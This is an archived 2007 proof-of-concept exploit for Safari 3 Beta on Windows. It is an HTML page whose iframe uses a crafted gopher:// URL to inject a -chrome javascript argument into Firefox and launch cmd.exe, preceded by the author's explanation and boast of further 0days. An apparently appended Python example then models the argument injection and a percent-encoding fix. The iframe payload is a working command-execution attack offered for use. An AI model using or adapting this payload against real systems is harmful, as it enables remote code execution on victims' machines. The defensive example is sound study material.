Safari 3 for Windows Beta Remote Command Execution PoC
Source: http://larholm.com  Author: Thor  Published: 2007-06-13
<!--
Safari for Windows, 0day exploit in 2 hours
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
By Thor Larholm

The below PoC exploit will exploit Safari by bouncing through Firefox
via the Gopher protocol, passing on unfiltered input for the -chrome
argument that Firefox exposes. When it has done this it will launch
C:\Windows\System32\cmd.exe with any arguments that have been specified
in the call to the process.run method.

It is important to know that, even though this PoC exploit uses Firefox,
the actual vulnerability is within the lack of input validation for the
command line arguments handed to the various URL protocol handlers on
your machine. As such, there are a lot of different attack vectors for
this vulnerability, I simply chose Firefox and the Gopher URL protocol
because I was familiar with these.

I hope you enjoyed the fruits of my 2 hours of labour. Please feel free
to add my RSS feed to your reader and come back again tomorrow or next
week for a fresh batch of 0day vulnerabilities :)

Cheers Thor Larholm
-->

<html><body>
<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[&#39;@mozilla.org/file/local;1&#39;].createInstance(I.nsILocalFile);file.initWithPath(&#39;C:&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;Windows&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;System32&#39;+String.fromCharCode(92)+String.fromCharCode(92)+&#39;cmd.exe&#39;);process=C[&#39;@mozilla.org/process/util;1&#39;].createInstance(I.nsIProcess);process.init(file);process.run(true&#44;{}&#44;0);alert(process)'></iframe>
</body></html>
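The root cause named in the comment above, missing validation of the URL before it is placed on a protocol handler's command line, can be shown from the launching side. This is an added example, not part of the original PoC or of any browser's code; the handler template, the path, the sample URL and the simplified argument splitter are constructed assumptions.

```python
import re
from urllib.parse import quote

# Constructed handler registration (assumption): the general shape of a
# Windows "shell\open\command" value, where %1 is replaced by the URL.
HANDLER_TEMPLATE = r'"C:\Program Files\Browser\browser.exe" -url "%1"'

# Constructed URL with the same shape as the PoC's iframe src: a double
# quote closes the -url argument and a new switch follows it.
HOSTILE_URL = 'gopher://example.test" -chrome "javascript:void(0)'


def split_windows_args(cmdline):
    """Simplified argv split: whitespace separates, double quotes group.
    Backslash-escaped quotes are not modelled (assumption)."""
    args, cur, in_quotes, started = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
            started = True
        elif ch in ' \t' and not in_quotes:
            if started:
                args.append(''.join(cur))
            cur, started = [], False
        else:
            cur.append(ch)
            started = True
    if started:
        args.append(''.join(cur))
    return args


def launch_naive(url):
    """The condition the PoC relies on: URL substituted with no validation."""
    return split_windows_args(HANDLER_TEMPLATE.replace('%1', url))


def launch_hardened(url):
    """Percent-encode everything outside a conservative URL character set,
    so quotes, spaces and backslashes never reach the command line."""
    if not re.match(r'^[A-Za-z][A-Za-z0-9+.-]*:', url):
        raise ValueError('not an absolute URL')
    safe = quote(url, safe=":/?#[]@!$&'()*+,;=%~")
    return split_windows_args(HANDLER_TEMPLATE.replace('%1', safe))


if __name__ == '__main__':
    print('naive   :', launch_naive(HOSTILE_URL))
    print('hardened:', launch_hardened(HOSTILE_URL))
```

With the naive substitution the handler receives `-chrome` as a separate switch; with the encoded URL it receives a single `-url` value.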

 